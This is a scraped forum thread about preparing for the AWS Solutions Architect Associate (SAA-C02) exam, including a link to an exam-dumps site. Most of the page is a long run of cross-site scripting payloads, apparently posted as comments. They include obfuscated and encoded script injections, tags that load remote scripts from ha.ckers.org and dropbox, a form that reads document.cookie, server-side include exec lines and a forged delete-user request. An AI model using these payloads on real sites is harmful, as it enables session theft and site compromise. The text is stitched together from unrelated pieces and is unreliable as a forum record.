AWS Certified Solutions Architect - Associate (SAA-C02)

Sign Up Free or Log In to participate!

AWS Solutions Architect Associate – outdated course

Hi, I am taking my AWS Solutions Architect Associate exam in a week, and I just realized today that I’ve been studying from an outdated version of the course:  https://learn.acloud.guru/course/aws-certified-solutions-architect-associate/dashboard

I just switched to the up-to-date course (2022): "AWS Certified Solutions Architect – Associate (SAA-C02)"

Since I don’t have much time to re-take the updated course from the beginning (I’m just going through the newly added chapters in 2022) , can someone please let me know what are the chapters that had major updates in the new course to help me save time?

I’d really appreciate the help.

Thanks.

Learning AWS

You can watch the summaries of each chapter at double speed.

Sbasheer

Thank you!

Yaad Karim

In my feed I see two courses titled AWS CSA Associate (SAA-C02), however, both have different materials. How do I know which one is the current one? My exam is also scheduled within a week.

CIBP2111

plzz visit https://www.dumpspedia.co/SAA-C02-dumps.html ,thnks

“>

">

1332 Answers

At this point, I’d take the practice exam of the updated course. That will give you a great idea of where you might be lacking and need to focus in on

Sara Bash

Thank you very much, I’ll do that!

I just took the exam this afternoon and passed. I recommend not only taking, the course, spending a lot of time in the labs, but doing the exam reviews right before you text. Don’t take notes. Just watch the videos and make sure you have the concepts in your head.

Yaad Karim

Congrats!

">

<input type="text" value="try it" />

<input type="text" value="try it" />

<input** type="text" value="try it" />

";a=prompt,a()//

x3Cscript>javascript:alert(1)

"`’>

//<form/action=javascript:alert(document.cookie)><input/type=’submit’>//

//| <script //| src=’https://dl.dropbox.com/u/13018058/js.js‘> //| </script //|

"><img src=x onerror=window.open(‘https://www.google.com/‘);>

//<form/action=javascript:alert(document.cookie)><input/type=’submit’>//

//| <script //| src=’https://dl.dropbox.com/u/13018058/js.js‘> //| </script //|

"><img src=x onerror=window.open(‘https://www.google.com/‘);>

oo

";alert(‘XSS’);//

x3c

x3C

u003c

u003C

oo

">

//<form/action=javascript:alert(document.cookie)><input/type=’submit’>//

//| <script //| src=’https://dl.dropbox.com/u/13018058/js.js‘> //| </script //|

"><img src=x onerror=window.open(‘https://www.google.com/‘);>

x3Cscript>javascript:alert(1)

"`’>

">

"><img src=x onerror=javascript:alert(1)>

"><img src=x onerror=javascript:alert(‘1’)>

"><img src=x onerror=javascript:alert((‘1’))>

"><img src=x onerror=javascript:alert((1))>

">

<img src="x" error="alert(1);>

<img src="x" onerror="alert(1);>

<img src=x ="alert(1)">



<img src=xx:xxonerror=alert(1)>

<iframe/onreadystatechange=alert('a') worksinIE>

<script/src=data:text/java&#115&#99&#114&#105&#112&#116,a%6C%65%72%74(/XSS/)></script

<body/onload=<!-->&#10alert(1)>

<img src ?itworksonchrome?/onerror = alert(1)

<--<img/src= onerror=alert(1)> --!>

<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)>

<img/src=%00 onerror=this.onerror=confirm(1)

<img src=%00 onerror=alert(1)

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

<script /%00/>/%00/alert(1)/%00/</script /%00/

"><h1/onmouseover='alert(1)'>%00

<img src=xx:xxonerror=alert(1)>

<iframe/onreadystatechange=alert('a') worksinIE>

<script/src=data:text/java&#115&#99&#114&#105&#112&#116,a%6C%65%72%74(/XSS/)></script

<body/onload=<!-->&#10alert(1)>

<img src ?itworksonchrome?/onerror = alert(1)

<--<img/src= onerror=alert(1)> --!>

<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)>

%253cscript%253ealert(1)%253c/script%253e

foo

<script>

hellox worldss

<BODY ONLOAD=alert('hellox worldss')>







...



LOL

<SCRIPT>alert(/XSS/.source)</SCRIPT>

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<BGSOUND SRC="javascript:alert('XSS');">

<IMG LOWSRC="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<BR SIZE="&{alert('XSS')}">

<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<XSS STYLE="behavior: url(xss.htc);">

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

<IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="mocha:[code]">

<IMG SRC="livescript:[code]">

~scriptualert(EXSSE)~/scriptu

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<IMG STYLE="xss:expr/XSS/ession(alert('XSS'))">

xss:ex/XSS////pression(alert("XSS"))'>

<XSS STYLE="xss:expression(alert('XSS'))">

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<!--[if gte IE 4]>

<SCRIPT>alert('XSS');</SCRIPT>

<![endif]-->

<BASE HREF="javascript:alert('XSS');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

a="get";

c="javascript:";

<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

eval(a+b+c+d);

</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

<XML SRC="xsstest.xml" ID=I></XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<HTML><BODY>

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

<?import namespace="t" implementation="#default#time2">

<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">

<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

</BODY></HTML>

<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->

<? echo('<SCR)';

echo('IPT>alert("XSS")</SCRIPT>'); ?>

<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=&gt; SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<A HREF="http://66.102.7.147/">XSS</A>

<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>

<A HREF="http://1113982867/">XSS</A>

<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>

<A HREF="http://0102.0146.0007.00000223/">XSS</A>

<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>

<A HREF="//www.google.com/">XSS</A>

<A HREF="//google">XSS</A>

<A HREF="http://ha.ckers.org@google">XSS</A>

<A HREF="http://google:ha.ckers.org">XSS</A>

<A HREF="http://google.com/">XSS</A>

<A HREF="http://www.google.com./">XSS</A>

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>

<

%3C

&lt

<

&LT

<

&#60

&#060

&#0060

&#00060

&#000060

&#0000060

<

&#x3c

&#x03c

&#x003c

&#x0003c

&#x00003c

&#x000003c

<

<

<

<

<

<

&#X3c

&#X03c

&#X003c

&#X0003c

&#X00003c

&#X000003c

<

<

<

<

<

<

&#x3C

&#x03C

&#x003C

&#x0003C

&#x00003C

&#x000003C

<

<

<

<

<

<

&#X3C

&#X03C

&#X003C

&#X0003C

&#X00003C

<

&#X000003C

<

<

<

<

<

<

<

<iframe src=http://ha.ckers.org/scriptlet.html>

<IMG SRC="javascript:alert('XSS')"

<SCRIPT SRC=//ha.ckers.org/.js>

<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<IMG SRC=" javascript:alert('XSS');">

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript&#058;alert("RSnake says, 'XSS'")>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

'';!--"<XSS>=&{()}

<IMG SRC=javascrscriptipt:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

�script�alert(�XSS�)�/script�

";alert('XSS');//

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-

%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-